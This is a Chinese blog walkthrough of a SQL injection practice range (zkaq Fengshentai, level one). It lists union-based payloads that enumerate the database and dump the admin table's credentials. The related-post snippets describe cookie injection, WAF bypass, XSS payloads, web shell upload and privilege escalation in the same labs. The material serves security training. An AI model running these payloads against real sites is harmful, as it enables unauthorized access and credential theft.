封神台sql注入的靶场,为了小芳,开冲

最新推荐文章于 2024-08-27 08:03:37 发布
最新推荐文章于 2024-08-27 08:03:37 发布
阅读量265 收藏 1
点赞数 1
分类专栏: 渗透入门 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wubuqing/article/details/109307878
版权

在这里插入图片描述先判断是否存在注入 1=1 返回正常 1=2 返回错误
所以存在SQL注入使用order by 查询该数据表的字段数量
使用order by 查询该数据表的字段数量Order by 2 返回正常 order by 3返回错误 所以字段数量是2
Order by 2 返回正常 order by 3返回错误 所以字段数量是2在这里插入图片描述
判断回显的位置
Union select 1,2在这里插入图片描述
在 2回显 然后查询数据库名
union select 1,database()
得到数据库名为 maoshe在这里插入图片描述
查询路径
union select 1,@@datadir
还有查询数据库版本
Union select 1,version()
然后查询表名
union select 1,(select table_name from information_schema.tables where table_schema=’maoshe’ limit 0,1)在这里插入图片描述
显示出第一个 是admin
将limit后的挨个查询后得到 admin dir news xss
然后在admin里查询字段名
Union 1,(select column_name from information_schema.columns where table_schema=’maoshe’ and table_name=’admin’ limit 0,1)
遇到一点问题一直返回不成功 然后发现网页没有将’转换成%27就一直没有返回,手动将’变成%27 解决了在这里插入图片描述
查询到里面有 id username password
然后查询里面的数据
union 1,(select group_concat (id,0x7e,username,0x7e,password) from admin)
在这里插入图片描述

其中 0x7e是波浪线~
然后就得到了password hellohack

神台sql注入---第一章节: 为了女神小芳
qq_52573109的博客
09-14 836
1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 2:解题过程: (1):打开传送门,点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。 (2):判断字段个数: 注入代码: order by 2 ...
神台DOM XSS靶场
qq_40941912的博客
10-05 1028
作业 DOM XSS靶场 (Rank: 10) 在页面上可填写的地方都输入 Native编码: \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0032\u0033\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e 插入到url中,发现弹窗了: 此处的payload被当作代码执行了 把xss平台
神台靶场
m0_71518346的博客
10-18 757
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
渗透测试练习靶场汇总
最新发布
qq_53058639的博客
08-27 990
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数取证、机器学习,多媒体技术,信息检索、舆情分析等。
mbp 神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
神台靶场练习
token_x的博客
08-05 406
神台靶场练习,未完待补充
神台 sql 注入靶场 writeup
白帽渗透笔记的博客
07-21 892
今天给大家带来神台 sql 注入靶场前 4 关的解题思路,并不算难。 地址 https://hack.zkaq.cn/battle#bid=cd23d4b58f0dfd3e 0x01 首先判断是否存在注入点,修改地址,尝试 id=1 and 1=1 可以正常显示数据,id=1 and 1=2 无法显示数据,故存在注入。 继续猜解字段数,id=1 order by 1 可以正常显示数据,一直到 4 才无法显示,故字段数为 3,使用 id=1 and 1=2 union select 1,
神台靶场(一)为了女神小芳SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 1006
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1647
1
神台靶场,为了小芳,冲之——cookie注入
Wubuqing的博客
10-30 454
第二个靶场 打开网站 找一下注入点 一般在新闻这种里面点开看看 先判断是否存在注入 有waf 尝试了很多方法绕过都没成功,/and/,aandnd,AnD等一系列都没绕过去,乌鸡鲅鱼 删掉id=169 发现 然后判断cookie注入 在搜索框输入 Javascript:alert(document.cookie=”id=”+escape(‘169’)); 然后弹窗了(其中 “id=” 取决URL中的id= escape中的数值也是URL中id=的值)返回刚刚的页面,把ID删除后一样能正常显示。说明服务器能
神台SQL注入-基础靶场1-显错注入
原味瓜子、的博客
09-28 1432
一、显错注入 Pass-01 判断注入类型 id=1 //有回显 id=1' // No results found 判断为数型注入 判断有几列 id=1 order by 3 //有回显 id=1 order by 4 // No results found 判断有三列 判断回显点 id=1 union select 1,2,3 ...
神台靶场 | 布尔盲注 | Pass05-07
Fanny0602的博客
03-12 1609
神台靶场 | 布尔盲注 题目地址: 掌控安全学院SQL注入靶场 文章目录       Pass05          盲注          盲注查询步骤       Pass06       Pass07 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 盲注: 1.查询到的数据只会显示有数据/没有结果 2.可以用ASCII进行猜测 盲注查询步骤: 1.数据库名长度 2.数据库库名 3.
神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 2678
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
神台靶场 | 显错注入 | Pass01-04
Fanny0602的博客
03-05 970
神台靶场 | 显错注入 题目地址: 掌控安全学院SQL注入靶场 显错注入 Pass01 Pass02 Pass03 Pass04 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass01 数据库查询语句: select *from user where id=1 Pass02 数据库查询语句: select *from user where id=‘1’ Pass03 数据库查询语句: select *from user where id=(‘1’) Pass04 数据库查询语
神台靶场-第六章
Mr_helloword的博客
07-11 1383
第六章-SYSTEM!POWER! Tips: 1、提权! 2、FLAG在C盘根目录下! 1.在第五章的基础上用菜刀连接,根据提示查看flag,发现没有权限,这里想到提权,这是本章重点( 注:如果中途出现掉线,重新连接菜刀,或重新上传木马连接) 2.上传cmd.exe,iis6.exe文件(在upfile这里上传这俩个文件) 3.打开cmd命令,想法:创建管理员组新用户成员,奈何权限低。 whoami查看当前用户:发现为web应用服务组成员,权限低 我们想到还有一个iis6,我们查看该用户发现为syst
神台靶场-第五章
Mr_helloword的博客
07-11 1938
第五章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改: 根据提示信息这
神台反射型XSS靶场
qq_40941912的博客
10-05 690
作业 反射型XSS靶场 (Rank: 5) 靶场上面是一个输入框,输入查看是否存在xss漏洞: 发现并没有任何反应 查看源码后发现,两个尖括号被替换成html里面用符表示出来的尖括号: 尖括号被过滤了,然后尝试在输入框内闭合引号,添加onfocus事件: 点击输入框: 触发了onfocus事件,拿到flag{zkaq-xssgood-Q0OA} 提交flag,成功 ...
神台靶场-第二章
Mr_helloword的博客
07-12 3132
第二章:遇到阻难!绕过WAF过滤 1.查找有无sql注入点利用and 1=1发现做了过滤 使用order by 查字段发现order by 没有被过滤,最后当字段为10时显示正常字段为10 2.因为网页做了waf过略防护,这里我们考虑用cookie注入,可以进行绕过: 这里我们使用一个小工具进行注入(火狐插件) 这款工具可以自定义请求头响应头(Request header,Reponse header) 打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空
神台在线靶场——第一章:为了女神小芳!
pigzlfa的博客
10-10 538
sql注入基础版。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值